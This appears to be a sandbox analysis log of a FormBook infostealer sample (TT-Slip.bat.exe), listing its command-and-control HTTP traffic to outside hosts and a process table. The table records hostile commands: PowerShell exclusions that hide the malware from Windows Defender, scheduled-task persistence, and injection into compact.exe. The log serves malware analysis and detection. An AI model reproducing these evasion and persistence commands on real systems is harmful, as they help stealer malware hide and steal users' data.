May 30, 2024 15:04:48.666326046 CEST	434	OUT	GET /hcaw/?aN6=3TWTWTzxVTU&I2ID3h=Xa5/huFy8Eck4v8ee+xdjh1i7ba8Clp/lHr4KuxbDQUg1IaZpZOFGkNm4jxFFpbvuuzZpNiUUgQ/swG1ojXNuXrL2/4+zEPMpu7c25bMsodP4e1eE2n/p2tEGurmvoeYLA== HTTP/1.1 Host: www.93v0.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
May 30, 2024 15:04:49.448120117 CEST	367	IN	HTTP/1.1 404 Not Found Date: Thu, 30 May 2024 13:04:49 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 63 61 77 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hcaw/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	49757	66.96.162.149	80	6428	C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe

Timestamp	Bytes transferred	Direction	Data
May 30, 2024 15:04:54.737507105 CEST	706	OUT	POST /mjuo/ HTTP/1.1 Host: www.leadchanges.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 207 Origin: http://www.leadchanges.info Referer: http://www.leadchanges.info/mjuo/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 49 32 49 44 33 68 3d 4c 57 69 62 72 6a 6f 48 56 6b 74 36 72 6c 54 61 72 49 45 49 75 2f 71 7a 43 66 35 52 4f 67 54 44 61 64 35 65 4c 4c 48 4a 6f 33 65 4f 49 36 68 47 41 2b 6d 30 37 6f 48 53 2b 78 42 31 2f 73 77 70 7a 49 65 76 61 30 38 66 4b 41 42 74 47 72 63 66 33 2f 61 54 75 35 34 6c 47 39 57 35 6d 37 47 52 7a 38 44 4b 6d 57 6f 59 5a 4f 68 44 6a 46 37 2b 78 58 4a 37 5a 58 48 46 37 54 79 34 54 32 71 71 69 7a 6c 62 42 6e 4e 4d 4c 5a 53 75 39 48 50 52 57 67 47 70 6b 45 6e 73 49 45 61 65 6a 67 31 34 31 76 41 79 57 7a 63 2f 34 39 71 43 4f 55 64 30 51 61 49 78 6d 76 44 76 49 4d 51 63 55 74 62 54 66 50 59 30 41 52 41 3d Data Ascii: I2ID3h=LWibrjoHVkt6rlTarIEIu/qzCf5ROgTDad5eLLHJo3eOI6hGA+m07oHS+xB1/swpzIeva08fKABtGrcf3/aTu54lG9W5m7GRz8DKmWoYZOhDjF7+xXJ7ZXHF7Ty4T2qqizlbBnNMLZSu9HPRWgGpkEnsIEaejg141vAyWzc/49qCOUd0QaIxmvDvIMQcUtbTfPY0ARA=
May 30, 2024 15:04:55.220489979 CEST	1087	IN	HTTP/1.1 404 Not Found Date: Thu, 30 May 2024 13:04:55 GMT Content-Type: text/html Content-Length: 867 Connection: close Server: Apache Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT Accept-Ranges: bytes Age: 0 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 [TRUNCATED] Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	49758	66.96.162.149	80	6428	C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe

Timestamp	Bytes transferred	Direction	Data
May 30, 2024 15:04:57.271773100 CEST	726	OUT	POST /mjuo/ HTTP/1.1 Host: www.leadchanges.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 227 Origin: http://www.leadchanges.info Referer: http://www.leadchanges.info/mjuo/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 49 32 49 44 33 68 3d 4c 57 69 62 72 6a 6f 48 56 6b 74 36 35 30 6a 61 6e 4c 73 49 35 50 71 79 50 50 35 52 42 41 54 48 61 64 31 65 4c 4b 43 4d 76 43 75 4f 49 62 39 47 48 38 65 30 36 6f 48 53 31 52 42 77 78 4d 77 2b 7a 49 61 52 61 31 77 66 4b 41 56 74 47 76 51 66 33 4d 79 51 76 70 34 6a 4b 64 58 2f 34 4c 47 52 7a 38 44 4b 6d 57 4e 39 5a 4f 35 44 6a 56 4c 2b 6a 69 6b 74 61 58 48 43 79 7a 79 34 5a 57 71 75 69 7a 6c 6c 42 6a 74 32 4c 61 6d 75 39 46 58 52 57 78 47 32 72 45 6d 6e 4d 45 62 57 79 7a 6f 61 78 4f 59 64 55 77 78 69 6f 4f 65 50 4c 69 77 65 4b 34 41 5a 31 50 76 58 59 66 59 72 46 64 36 36 46 73 49 45 65 47 58 34 46 47 4e 50 53 35 77 52 41 6e 56 69 39 71 64 7a 45 55 4d 4e Data Ascii: I2ID3h=LWibrjoHVkt650janLsI5PqyPP5RBATHad1eLKCMvCuOIb9GH8e06oHS1RBwxMw+zIaRa1wfKAVtGvQf3MyQvp4jKdX/4LGRz8DKmWN9ZO5DjVL+jiktaXHCyzy4ZWquizllBjt2Lamu9FXRWxG2rEmnMEbWyzoaxOYdUwxioOePLiweK4AZ1PvXYfYrFd66FsIEeGX4FGNPS5wRAnVi9qdzEUMN

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	49759	66.96.162.149	80	6428	C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe

Timestamp	Bytes transferred	Direction	Data
May 30, 2024 15:04:59.804445982 CEST	1743	OUT	POST /mjuo/ HTTP/1.1 Host: www.leadchanges.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 1243 Origin: http://www.leadchanges.info Referer: http://www.leadchanges.info/mjuo/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 49 32 49 44 33 68 3d 4c 57 69 62 72 6a 6f 48 56 6b 74 36 35 30 6a 61 6e 4c 73 49 35 50 71 79 50 50 35 52 42 41 54 48 61 64 31 65 4c 4b 43 4d 76 44 36 4f 49 70 31 47 48 64 65 30 35 6f 48 53 36 42 42 78 78 4d 77 6a 7a 49 69 4e 61 31 4d 50 4b 44 74 74 41 4b 4d 66 7a 4e 79 51 68 70 34 6a 43 39 57 34 6d 37 47 2b 7a 38 54 4f 6d 57 64 39 5a 4f 35 44 6a 57 54 2b 67 33 49 74 57 33 48 46 37 54 79 73 54 32 71 47 69 79 4d 64 42 6a 6f 4c 4c 4d 57 75 2b 6d 76 52 56 48 36 32 30 30 6d 6c 42 6b 61 51 79 7a 6b 73 78 4f 30 37 55 77 31 49 6f 4f 32 50 4c 54 5a 30 64 36 30 36 70 50 44 61 63 6f 67 30 55 34 71 42 4b 66 4d 56 57 6d 4f 66 4a 47 63 68 55 64 77 78 4f 7a 45 51 68 50 38 67 49 54 68 65 37 78 38 73 4b 33 42 2b 78 78 49 69 6c 48 34 35 2b 41 6d 44 6d 37 71 6e 30 56 44 6f 52 6e 58 4c 54 2f 43 68 52 34 76 74 47 4c 38 41 65 55 48 66 78 45 58 35 69 64 43 38 56 74 46 45 4a 68 41 37 71 62 4a 48 45 46 42 43 6e 61 59 34 47 79 32 6d 63 36 62 59 4b 58 6c 45 36 43 46 77 36 74 61 4b 67 52 66 42 79 34 52 36 6b 30 68 67 43 55 42 [TRUNCATED] Data Ascii: I2ID3h=LWibrjoHVkt650janLsI5PqyPP5RBATHad1eLKCMvD6OIp1GHde05oHS6BBxxMwjzIiNa1MPKDttAKMfzNyQhp4jC9W4m7G+z8TOmWd9ZO5DjWT+g3ItW3HF7TysT2qGiyMdBjoLLMWu+mvRVH6200mlBkaQyzksxO07Uw1IoO2PLTZ0d606pPDacog0U4qBKfMVWmOfJGchUdwxOzEQhP8gIThe7x8sK3B+xxIilH45+AmDm7qn0VDoRnXLT/ChR4vtGL8AeUHfxEX5idC8VtFEJhA7qbJHEFBCnaY4Gy2mc6bYKXlE6CFw6taKgRfBy4R6k0hgCUB3NH25tiJVBtoVKfLUR1JZORPho7Fu7NvRNHWEyorm5rQTFUkWlTbrQLaEDV/SsXoDO9VbxRHQuQLtP9BEvEreIiOAzAvMBzBMrxliR0Meqq+xQL9I7RH5eKyjmw4hKczWVWw/9MYk4QczfOQwxi2SjFJkm8Yp2Gi0/iRz1ISRieNK/lYIesFU4o03kzvWQXgFU+kRBVeVYm5bxdpBx3JwxdefrU0vzc3V0MpHXHPCDb/S4iDMNPHBkP1qA+4MT00dKkLS695F/FyzhG0MyFDqWpacVLGR/w9QesiRabv9PH71Ll+SOGLVWWluP8zzHR9btttj7oC+Yw6vQ0MSKEn0kezA4iPaPLVwzlyxqZe5QoSheLbcOjkcPPlX4uqQpFF/TkkmNvL90O/7rG/zy2h7wLfhmldCNXyfCI8PFh2WlQkvfNDIbYclBUEFy4R1PYZzIsPZdcQJTHMJszM4Q4KL3MFHFnfnviuyqXhvYdbgTFK1F85nL0bYHjcQ1PzvQJSM37xJXmlKf+QybmS/YUgzYdfmSGfjPag4Ijf3E2fucCkp7LIN7mpmFBNHuYqNn6o/bbay3vTNSNgUP/2f0icaojBVtE5OniMAFE8IVeTIkrNy5fQylB1dac3WX8L5Ry3zChDepovBaUUbqomRw14uA620Z69SC1dTT [TRUNCATED]
May 30, 2024 15:05:00.303379059 CEST	1087	IN	HTTP/1.1 404 Not Found Date: Thu, 30 May 2024 13:05:00 GMT Content-Type: text/html Content-Length: 867 Connection: close Server: Apache Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT Accept-Ranges: bytes Age: 0 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 [TRUNCATED] Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	49760	66.96.162.149	80	6428	C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe

Timestamp	Bytes transferred	Direction	Data
May 30, 2024 15:05:02.336328983 CEST	442	OUT	GET /mjuo/?I2ID3h=GUK7oVIRF3FAoVisjIpZqa7HO+54FDT9CfoAB53ViUuzbZ1TAtWa7LnCzENP06w/wd6reHxcMz42RIoq6sWsnaQUI6Xonsfl1/2Pr0gDDe9u92eKgSNgaya45CSuU3/+xA==&aN6=3TWTWTzxVTU HTTP/1.1 Host: www.leadchanges.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
May 30, 2024 15:05:02.818444014 CEST	1087	IN	HTTP/1.1 404 Not Found Date: Thu, 30 May 2024 13:05:02 GMT Content-Type: text/html Content-Length: 867 Connection: close Server: Apache Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT Accept-Ranges: bytes Age: 0 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 [TRUNCATED] Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>

Target ID:	0
Start time:	09:01:02
Start date:	30/05/2024
Path:	C:\Users\user\Desktop\TT-Slip.bat.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\TT-Slip.bat.exe"
Imagebase:	0x1d0000
File size:	743'424 bytes
MD5 hash:	0C7240337B784ADD7B481B55E4326E66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:01:03
Start date:	30/05/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT-Slip.bat.exe"
Imagebase:	0x750000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	09:01:03
Start date:	30/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	09:01:03
Start date:	30/05/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe"
Imagebase:	0x750000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	09:01:03
Start date:	30/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	09:01:03
Start date:	30/05/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IiIseKTckjhZgQ" /XML "C:\Users\user\AppData\Local\Temp\tmp9EE7.tmp"
Imagebase:	0x5e0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	09:01:03
Start date:	30/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	09:01:04
Start date:	30/05/2024
Path:	C:\Users\user\Desktop\TT-Slip.bat.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\TT-Slip.bat.exe"
Imagebase:	0xc70000
File size:	743'424 bytes
MD5 hash:	0C7240337B784ADD7B481B55E4326E66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2375891117.00000000015D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.2375891117.00000000015D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2375025408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.2375025408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2376998691.0000000001AB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.2376998691.0000000001AB0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	09:01:06
Start date:	30/05/2024
Path:	C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe
Imagebase:	0xf40000
File size:	743'424 bytes
MD5 hash:	0C7240337B784ADD7B481B55E4326E66
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 50%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	09:01:07
Start date:	30/05/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6ef0c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	09:01:10
Start date:	30/05/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IiIseKTckjhZgQ" /XML "C:\Users\user\AppData\Local\Temp\tmpBA10.tmp"
Imagebase:	0x5e0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	09:01:10
Start date:	30/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	09:01:11
Start date:	30/05/2024
Path:	C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe"
Imagebase:	0x550000
File size:	743'424 bytes
MD5 hash:	0C7240337B784ADD7B481B55E4326E66
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	09:01:27
Start date:	30/05/2024
Path:	C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe"
Imagebase:	0x840000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.4515341375.0000000002480000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.4515341375.0000000002480000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	09:01:29
Start date:	30/05/2024
Path:	C:\Windows\SysWOW64\compact.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\compact.exe"
Imagebase:	0x5e0000
File size:	41'472 bytes
MD5 hash:	5CB107F69062D6D387F4F7A14737220E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.4514397970.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.4514397970.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.4514322449.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.4514322449.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.4514041725.0000000002900000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.4514041725.0000000002900000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	09:01:41
Start date:	30/05/2024
Path:	C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe"
Imagebase:	0x840000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
